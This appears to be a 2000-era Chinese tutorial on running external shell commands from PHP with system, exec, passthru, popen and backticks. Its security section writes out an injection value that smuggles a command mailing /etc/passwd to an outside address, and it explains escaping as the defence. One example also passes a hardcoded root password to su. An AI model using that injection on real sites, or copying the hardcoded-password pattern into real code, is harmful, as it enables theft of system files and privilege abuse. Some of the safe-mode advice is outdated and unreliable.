PHP作為一種伺服器端的指令碼語言,象編寫簡單,或者是複雜的動態網頁這樣的任務,它完全能夠勝任。但事情不總是如此,有時為了實現某個功能,必須藉助於作業系統的外部程式(或者稱之為命令),這樣可以做到事半功倍。
那麼,是否可以在PHP指令碼中調用外部命令呢?如果能,如何去做呢?有些什麼方面的顧慮呢?相信你看了本文後,肯定能夠回答這些問題了。
是否可以?
答案是肯定的。PHP和其它的程式設計語言一樣,完全可以在程式內調用外部命令,並且是很簡單的:只要用一個或幾個函數即可。
前提條件
由於PHP基本是用於WEB程式開發的,所以安全性成了人們考慮的一個重要方面。於是PHP的設計者們給PHP加了一個門:安全模式。如果運行在安全模式下,那麼PHP指令碼中將受到如下四個方面的限制:
執行外部命令
在開啟檔案時有些限制
串連MySQL資料庫
基於HTTP的認證
在安全模式下,只有在特定目錄中的外部程式才可以被執行,對其它程式的調用將被拒絕。這個目錄可以在php.ini檔案中用safe_mode_exec_dir指令,或在編譯PHP是加上--with-exec-dir選項來指定,預設是/usr/local/php/bin。
如果你調用一個應該可以輸出結果的外部命令(意思是PHP指令碼沒有錯誤),得到的卻是一片空白,那麼很可能你的網管已經把PHP運行在安全模式下了。
如何做?
在PHP中調用外部命令,可以用如下三種方法來實現:
1) 用PHP提供的專門函數
PHP提供共了3個專門的執行外部命令的函數:system(),exec(),passthru()。
system()
原型:string system (string command [, int return_var])
system()函數很其它語言中的差不多,它執行給定的命令,輸出和返回結果。第二個參數是可選的,用來得到命令執行後的狀態代碼。
例子:
system("/usr/local/bin/webalizer/webalizer");
?>
exec()
原型:string exec (string command [, string array [, int return_var]])
exec()函數與system()類似,也執行給定的命令,但不輸出結果,而是返回結果的最後一行。雖然它只返回命令結果的最後一行,但用第二個參數array可以得到完整的結果,方法是把結果逐行追加到array的結尾處。所以如果array不是空的,在調用之前最好用unset()最它清掉。只有指定了第二個參數時,才可以用第三個參數,用來取得命令執行的狀態代碼。
例子:
exec("/bin/ls -l");
exec("/bin/ls -l", $res);
#$res是一個資料,每個元素代表結果的一行
exec("/bin/ls -l", $res, $rc);
#$rc的值是命令/bin/ls -l的狀態代碼。成功的情況下通常是0
?>
passthru()
原型:void passthru (string command [, int return_var])
passthru()只調用命令,不返回任何結果,但把命令的運行結果原樣地直接輸出到標準輸出裝置上。所以passthru()函數經常用來調用象pbmplus(Unix下的一個處理圖片的工具,輸出二進位的原始圖片的流)這樣的程式。同樣它也可以得到命令執行的狀態代碼。
例子:
header("Content-type: image/gif");
passthru("./ppmtogif hunte.ppm");
?>
2) 用popen()函數開啟進程
上面的方法只能簡單地執行命令,卻不能與命令互動。但有些時候必須向命令輸入一些東西,如在增加Linux的系統使用者時,要調用su來把目前使用者換到root才行,而su命令必須要在命令列上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。
popen()函數開啟一個進程管道來執行給定的命令,返回一個檔案控制代碼。既然返回的是一個檔案控制代碼,那麼就可以對它讀和寫了。在PHP3中,對這種控制代碼只能做單一的操作模式,要麼寫,要麼讀;從PHP4開始,可以同時讀和寫了。除非這個控制代碼是以一種模式(讀或寫)開啟的,否則必須調用pclose()函數來關閉它。
例子1:
$fp=popen("/bin/ls -l", "r");
?>
例子2(本例來自PHP中國聯盟網站http://www.phpx.com/show.php?d=col&i=51):
/* PHP中如何增加一個系統使用者
下面是一段常式,增加一個名字為james的使用者,
root密碼是 verygood。僅供參考
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s \"%s %s\"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);
?>
3) 用反撇號(`,也就是鍵盤上ESC鍵下面的那個,和~在同一個上面)
這個方法以前沒有歸入PHP的文檔,是作為一個秘技存在的。方法很簡單,用兩個反撇號把要執行的命令括起來作為一個運算式,這個運算式的值就是命令執行的結果。如:
$res=`/bin/ls -l`;
echo '
'.$res.'
';
?>
這個指令碼的輸出就象:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考慮些什嗎?
要考慮兩個問題:安全性和逾時。
先看安全性。比如,你有一家小型的網上商店,所以可以出售的產品列表放在一個檔案中。你編寫了一個有表單的HTML檔案,讓你的使用者輸入他們的EMAIL地址,然後把這個產品列表發給他們。假設你沒有使用PHP的mail()函數(或者從未聽說過),你就調用Linux/Unix系統的mail程式來發送這個檔案。程式就象這樣:
system("mail $to < products.txt");
echo "我們的產品目錄已經發送到你的信箱:$to";
?>
用這段代碼,一般的使用者不會產生什麼危險,但實際上存在著非常大的安全性漏洞。如果有個惡意的使用者輸入了這樣一個EMAIL地址:
'--bla ; mail someone@domain.com < /etc/passwd ;'
那麼這條命令最終變成:
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
我相信,無論哪個網路管理員見到這樣的命令,都會嚇出一身冷汗來。
幸好,PHP為我們提供了兩個函數:EscapeShellCmd()和EscapeShellArg()。函數EscapeShellCmd把一個字串中所有可能瞞過Shell而去執行另外一個命令的字元轉義。這些字元在Shell中是有特殊含義的,象分號(),重新導向(>)和從檔案讀入(<)等。函數EscapeShellArg是用來處理命令的參數的。它在給定的字串兩邊加上單引號,並把字串中的單引號轉義,這樣這個字串就可以安全地作為命令的參數。
再來看看逾時問題。如果要執行的命令要花費很長的時間,那麼應該把這個命令放到系統的後台去運行。但在預設情況下,象system()等函數要等到這個命令運行完才返回(實際上是要等命令的輸出結果),這肯定會引起PHP指令碼的逾時。解決的辦法是把命令的輸出重新導向到另外一個檔案或流中,如:
system("/usr/local/bin/order_proc > /tmp/null &");
?>
Hunte於2000年10月28日
http://www.bkjia.com/PHPjc/316663.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/316663.htmlTechArticlePHP作為一種伺服器端的指令碼語言,象編寫簡單,或者是複雜的動態網頁這樣的任務,它完全能夠勝任。但事情不總是如此,有時為了實現某...